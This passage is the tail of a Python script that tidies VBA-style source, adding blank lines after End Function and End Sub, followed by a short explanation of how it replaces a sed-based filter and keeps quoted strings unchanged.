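        out.append(line)
        if re.match(r'\s*End (Function|Sub)\b', line):
            out.append("")
    return "\n".join(out)

if __name__ == "__main__":
    import sys
    print(tidy(sys.stdin.read()))
```

Used as a filter it takes the same stdin/stdout role as the sed chain. Because the whole-word regex is applied in one pass per line, the order of the keyword list no longer matters; the split on double quotes is what keeps a string such as "end" untouched.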